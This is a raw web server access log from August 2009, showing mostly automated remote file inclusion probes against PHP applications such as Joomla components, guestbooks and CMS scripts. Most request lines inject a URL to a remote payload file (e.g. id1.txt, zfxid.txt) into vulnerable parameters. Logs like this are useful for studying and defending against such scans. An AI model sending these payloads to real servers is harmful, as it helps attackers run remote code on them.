115.88.240.91 - - [16/Aug/2009:07:12:43 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:07:12:43 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.diccor.es/clientes/modules/Forums/admin/license.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:12:44 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.diccor.es/clientes/modules/Forums/admin/license.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
218.27.203.107 - - [16/Aug/2009:07:12:46 -0500] "GET /logs/access_log.1244764800//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:07:12:46 -0500] "GET //?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:12:47 -0500] "GET /logs/access_log.1244764800/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:07:12:48 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:12:49 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:07:12:49 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
115.88.240.91 - - [16/Aug/2009:07:12:49 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:07:12:50 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
115.88.240.91 - - [16/Aug/2009:07:12:51 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:12:54 -0500] "GET /logs/access_log.1244764800/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
118.168.12.228 - - [16/Aug/2009:07:13:05 -0500] "GET /logs/index.php?meio=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 285 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.228 - - [16/Aug/2009:07:13:05 -0500] "GET /logs/index.php?meio=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 285 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.228 - - [16/Aug/2009:07:13:07 -0500] "GET /index.php?meio=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 280 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.228 - - [16/Aug/2009:07:13:07 -0500] "GET /index.php?meio=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 280 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.228 - - [16/Aug/2009:07:13:13 -0500] "GET /logs/become_editor.php?theme_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.228 - - [16/Aug/2009:07:13:15 -0500] "GET /become_editor.php?theme_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 288 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
69.73.159.26 - - [16/Aug/2009:07:13:21 -0500] "GET /logs/access_log.1243036800/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:13:26 -0500] "GET /logs/access_log.1243728000/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:13:41 -0500] "GET /logs/access_log.1238544000//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:07:13:46 -0500] "GET /logs/access_log.1242777600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:13:47 -0500] "GET /logs/access_log.1243036800/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:13:48 -0500] "GET /logs/access_log.1243728000/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.106.155 - - [16/Aug/2009:07:14:47 -0500] "GET /logs/access_log.1174003200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.97.167.21 - - [16/Aug/2009:07:15:01 -0500] "GET /logs/access_log.1244764800/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:07:15:22 -0500] "GET /logs/access_log.1243036800/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:07:15:26 -0500] "GET /logs/access_log.1243728000/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:07:18:30 -0500] "GET //guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:07:18:30 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:07:18:30 -0500] "GET /logs//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [16/Aug/2009:07:18:58 -0500] "GET /logs/access_log.1238544000//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.38.188.164 - - [16/Aug/2009:07:19:41 -0500] "GET /setup.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
65.38.188.164 - - [16/Aug/2009:07:19:41 -0500] "GET /logs/setup.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
65.38.188.164 - - [16/Aug/2009:07:19:56 -0500] "GET /setup.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
65.38.188.164 - - [16/Aug/2009:07:19:56 -0500] "GET /logs/setup.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
116.122.158.207 - - [16/Aug/2009:07:19:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:19:56 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:19:56 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
151.8.79.19 - - [16/Aug/2009:07:20:14 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
151.8.79.19 - - [16/Aug/2009:07:20:14 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
151.8.79.19 - - [16/Aug/2009:07:20:14 -0500] "GET /logs/access_log.1247184000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
118.168.12.104 - - [16/Aug/2009:07:20:23 -0500] "GET /logs/become_editor.php?theme_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.104 - - [16/Aug/2009:07:20:25 -0500] "GET /become_editor.php?theme_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 288 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
151.8.79.19 - - [16/Aug/2009:07:21:48 -0500] "GET /logs/access_log.1242000000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:07:21:50 -0500] "GET //guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:07:21:50 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
165.95.1.130 - - [16/Aug/2009:07:21:51 -0500] "GET /logs//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:07:22:02 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:07:22:02 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
118.168.12.104 - - [16/Aug/2009:07:22:35 -0500] "GET /logs/index.php?meio=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 285 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.104 - - [16/Aug/2009:07:22:36 -0500] "GET /index.php?meio=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 280 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.104 - - [16/Aug/2009:07:22:44 -0500] "GET /logs/index.php?meio=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 285 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
118.168.12.104 - - [16/Aug/2009:07:22:45 -0500] "GET /index.php?meio=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.0" 404 280 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
207.158.22.128 - - [16/Aug/2009:07:23:59 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
207.158.22.128 - - [16/Aug/2009:07:23:59 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
207.158.22.128 - - [16/Aug/2009:07:25:28 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:25:28 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:25:28 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:07:26:31 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:07:26:31 -0500] "GET /logs/access_log.1247184000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:07:26:31 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:07:26:40 -0500] "GET /logs/access_log.1242000000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:26:47 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:26:47 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:26:47 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:26:57 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:29:01 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:29:01 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:29:01 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
198.145.43.142 - - [16/Aug/2009:07:31:25 -0500] "GET /logs/appserv/errors.php?error=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
198.145.43.142 - - [16/Aug/2009:07:31:25 -0500] "GET /logs/access_log.1238803200/appserv/errors.php?error=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
198.145.43.142 - - [16/Aug/2009:07:31:25 -0500] "GET /appserv/errors.php?error=http://www.better-battles.com/includes/conf/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:16 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:16 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:16 -0500] "GET /logs/access_log.1238976000//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.207.95 - - [16/Aug/2009:07:32:18 -0500] "GET /logs/access_log.1244073600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.141.196.8 - - [16/Aug/2009:07:32:24 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:07:32:24 -0500] "GET /logs/access_log.1238976000//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:07:32:24 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:26 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:26 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:26 -0500] "GET /logs/access_log.1238976000//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:30 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:30 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:32:30 -0500] "GET /logs/access_log.1238976000//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:33:00 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:07:34:12 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dasi.ttowa.com//bbs/data/rich/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:07:35:30 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:07:35:30 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:07:35:33 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
125.141.196.8 - - [16/Aug/2009:07:35:46 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:40:19 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:40:19 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:40:19 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:42:21 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:42:21 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:42:22 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:42:23 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:42:23 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:42:23 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:44:32 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:44:32 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.246.252.166 - - [16/Aug/2009:07:44:32 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.45.176.106 - - [16/Aug/2009:07:48:10 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.neverspam.or.kr/manual/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.45.176.106 - - [16/Aug/2009:07:48:10 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://www.neverspam.or.kr/manual/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.45.176.106 - - [16/Aug/2009:07:48:10 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.neverspam.or.kr/manual/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:49:28 -0500] "GET /logs/access_log.1243641600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//Us